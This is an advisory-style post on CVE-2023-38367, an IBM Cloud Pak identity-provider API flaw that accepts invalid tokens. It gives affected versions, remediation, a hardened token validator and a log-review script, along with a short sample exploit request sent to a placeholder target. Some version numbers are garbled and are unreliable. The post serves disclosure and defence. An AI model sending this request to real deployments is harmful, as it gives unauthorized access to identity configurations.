A security vulnerability has been discovered in the IBM Cloud Pak Foundational Services Identity Provider (IdP) API that affects IBM Cloud Pak for Automation versions 18.. to 22..2. It allows an unauthenticated attacker to perform CRUD operations using an invalid token, that is, to view, update, delete, or create an IdP configuration. This post gives an overview of the vulnerability, the exploit, and the remediation steps.

CVE-ID

CVE-2023-38367

Affected Products

IBM Cloud Pak for Automation 18.., 18..1, 18..2, 19..1, 19..2, 19..3, 20..1, 20..2, 20..3, 21..1, 21..2, 21..3, 22..1, and 22..2.

IBM X-Force ID

261130

Vulnerability Details

The vulnerability exists in the IBM Cloud Pak Foundational Services Identity Provider (IdP) API. Because access tokens are not validated correctly, an attacker holding only an invalid token can perform CRUD (Create, Read, Update, and Delete) operations on IdP configurations.
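To make the flaw concrete, here is an added example (not IBM's code, and not taken from the advisory) of a bearer-token check that only tests whether a token is present, the class of mistake the advisory describes, beside a hardened check that verifies a signed token's structure, HMAC signature, issuer and expiry before any IdP configuration request is served. The signing key, the issuer URL, and the handler for the configs path are constructed for the example.

```python
# Added example (not IBM code): a presence-only bearer check, as in the class
# of flaw behind CVE-2023-38367, next to a hardened signed-token check.
import base64
import hashlib
import hmac
import json
import time
from typing import Callable, Optional

SIGNING_KEY = b"constructed-demo-key"            # constructed sample key, not a real secret
EXPECTED_ISSUER = "https://idp.example.invalid"  # hypothetical issuer for the example


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def issue_token(subject: str, ttl_seconds: int = 300, now: Optional[float] = None) -> str:
    """Create an HMAC-SHA256 signed token in JWT layout: header.payload.signature."""
    now = time.time() if now is None else now
    header = _b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    payload = _b64url(json.dumps({"sub": subject, "iss": EXPECTED_ISSUER,
                                  "exp": int(now + ttl_seconds)}).encode())
    sig = hmac.new(SIGNING_KEY, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{_b64url(sig)}"


def weak_is_authorized(authorization_header: str) -> bool:
    """Flawed check: any non-empty Bearer value passes, so an invalid token is accepted."""
    scheme, _, token = authorization_header.partition(" ")
    return scheme == "Bearer" and len(token) > 0


def strong_is_authorized(authorization_header: str, now: Optional[float] = None) -> bool:
    """Hardened check: structure, algorithm, HMAC signature, issuer and expiry are all verified."""
    now = time.time() if now is None else now
    scheme, _, token = authorization_header.partition(" ")
    if scheme != "Bearer":
        return False
    parts = token.split(".")
    if len(parts) != 3:
        return False
    header_b64, payload_b64, sig_b64 = parts
    try:
        header = json.loads(_b64url_decode(header_b64))
        payload = json.loads(_b64url_decode(payload_b64))
        presented_sig = _b64url_decode(sig_b64)
    except ValueError:  # covers binascii.Error, UnicodeDecodeError and JSONDecodeError
        return False
    if not isinstance(header, dict) or not isinstance(payload, dict):
        return False
    if header.get("alg") != "HS256":  # refuse "none" and any unexpected algorithm
        return False
    expected_sig = hmac.new(SIGNING_KEY, f"{header_b64}.{payload_b64}".encode(),
                            hashlib.sha256).digest()
    if not hmac.compare_digest(expected_sig, presented_sig):  # constant-time comparison
        return False
    if payload.get("iss") != EXPECTED_ISSUER:
        return False
    exp = payload.get("exp")
    return isinstance(exp, int) and exp > now


def handle_idp_config_request(method: str, authorization_header: str,
                              validator: Callable[[str], bool]) -> int:
    """Hypothetical handler for /idp-api/v2/configs; returns the HTTP status it would send."""
    if not validator(authorization_header):
        return 401
    return 200 if method == "GET" else 204


if __name__ == "__main__":
    bogus = "Bearer Invalid-Token-Here"
    print("weak validator  :", handle_idp_config_request("GET", bogus, weak_is_authorized))
    print("strong validator:", handle_idp_config_request("GET", bogus, strong_is_authorized))
```

The point of the contrast is that the request from the advisory's sample exploit receives a 200 from the weak validator and a 401 from the hardened one; the hardened check also rejects expired tokens, tokens with a tampered payload, and tokens signed with a different key or algorithm.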

Exploit Details

An attacker can exploit this vulnerability by sending an HTTP request carrying an invalid token to the affected API. The code snippet below demonstrates a sample exploit:

import requests

# Any non-valid bearer value exercises the flaw: the affected API does not
# verify the token before handling the request
invalid_token = 'Invalid-Token-Here'
headers = {'Authorization': f'Bearer {invalid_token}'}

# Replace with the target IP address and port
url = 'http://target-ip:port/idp-api/v2/configs'

# Read the IdP configurations; a 200 response to this request shows the flaw
response = requests.get(url, headers=headers)

Once the exploit succeeds, the attacker has unauthorized access to the IdP configuration and can read it and potentially modify or delete it, which amounts to a security breach.


Remediation

IBM has released patches to address this vulnerability in the affected products. Users of the IBM Cloud Pak Foundational Services Identity Provider (IdP) API are advised to update to the latest version to protect against this vulnerability. The list of fixed versions is as follows:

IBM Cloud Pak for Automation 22..3

In addition to applying the patches, it is crucial to follow best security practices, such as reviewing access controls, monitoring access logs, and ensuring proper input validation.
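As an added example of the access-log review recommended above (not IBM code; the log format, field names and every sample line are constructed for the example, and assume a gateway in front of the API that records whether a bearer token was present and how many dot-separated segments it had, without logging the token itself), the following flags successful responses on the IdP configs path that were granted to absent or malformed tokens, and lists every successful write to an IdP configuration for review.

```python
# Added example (not IBM code): review constructed access-log lines for signs
# that the IdP configuration API served requests it should have rejected.
import re
from typing import Dict, List, Optional

# Constructed log format (hypothetical gateway in front of the API):
#   <timestamp> <src_ip> <method> <path> <status> authz=<none|bearer> segments=<n>
# "segments" is the number of dot-separated parts of the bearer token; a JWT has three.
LOG_LINE = re.compile(
    r"^(?P<ts>\S+) (?P<src>\S+) (?P<method>[A-Z]+) (?P<path>\S+) (?P<status>\d{3}) "
    r"authz=(?P<authz>\S+) segments=(?P<segments>\d+)$"
)

CONFIG_PATH_PREFIX = "/idp-api/v2/configs"        # path used in the advisory's sample request
WRITE_METHODS = {"POST", "PUT", "PATCH", "DELETE"}

# Constructed sample log: one legitimate read, two requests with a one-segment
# (non-JWT) token that were nonetheless served, one rejected request, one
# legitimate write, and an unrelated health check.
SAMPLE_LOG = """\
2024-02-29T02:15:09Z 10.0.0.5 GET /idp-api/v2/configs 200 authz=bearer segments=3
2024-02-29T02:16:11Z 203.0.113.7 GET /idp-api/v2/configs 200 authz=bearer segments=1
2024-02-29T02:16:40Z 203.0.113.7 DELETE /idp-api/v2/configs/saml-corp 204 authz=bearer segments=1
2024-02-29T02:17:02Z 10.0.0.9 GET /idp-api/v2/configs 401 authz=none segments=0
2024-02-29T02:18:30Z 10.0.0.5 PUT /idp-api/v2/configs/saml-corp 200 authz=bearer segments=3
2024-02-29T02:19:00Z 10.0.0.5 GET /healthz 200 authz=none segments=0
"""


def parse_line(line: str) -> Optional[Dict[str, object]]:
    """Parse one log line into a record, or return None for lines in another format."""
    m = LOG_LINE.match(line.strip())
    if not m:
        return None
    rec: Dict[str, object] = m.groupdict()
    rec["status"] = int(m.group("status"))
    rec["segments"] = int(m.group("segments"))
    return rec


def review_log(text: str) -> List[Dict[str, str]]:
    """Return findings for successful requests on the IdP configs path."""
    findings: List[Dict[str, str]] = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None or not str(rec["path"]).startswith(CONFIG_PATH_PREFIX):
            continue
        status = int(rec["status"])
        if not 200 <= status < 300:
            continue  # rejected requests are the expected outcome for bad tokens
        base = {"ts": str(rec["ts"]), "src": str(rec["src"]),
                "method": str(rec["method"]), "path": str(rec["path"])}
        # A served request whose token was absent or not JWT-shaped is the
        # signature of the advisory's flaw: an invalid token was accepted.
        if not (rec["authz"] == "bearer" and rec["segments"] == 3):
            findings.append(dict(base, rule="invalid_token_accepted"))
        # Every successful write to an IdP configuration deserves a human look.
        if rec["method"] in WRITE_METHODS:
            findings.append(dict(base, rule="idp_config_write"))
    return findings


def count_by_rule(findings: List[Dict[str, str]]) -> Dict[str, int]:
    counts: Dict[str, int] = {}
    for f in findings:
        counts[f["rule"]] = counts.get(f["rule"], 0) + 1
    return counts


if __name__ == "__main__":
    for finding in review_log(SAMPLE_LOG):
        print(finding)
    print(count_by_rule(review_log(SAMPLE_LOG)))
```

On the sample log this yields two "invalid_token_accepted" findings (both from 203.0.113.7, one of them a DELETE of an IdP configuration) and two "idp_config_write" findings; the 401 and the health check produce nothing. On a patched deployment the first rule should never fire, which makes it a useful regression check after the update.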

Conclusion

CVE-2023-38367 highlights the importance of ensuring proper access controls and validation for sensitive APIs, particularly in cloud environments. It serves as a reminder to software developers and security professionals to maintain vigilance in protecting user data by following established security protocols and practices. By promptly applying patches and taking the necessary remediation steps, organizations can minimize their exposure to this vulnerability and maintain a secure environment.

Timeline

Published on: 02/29/2024 02:15:09 UTC
Last modified on: 02/29/2024 13:49:29 UTC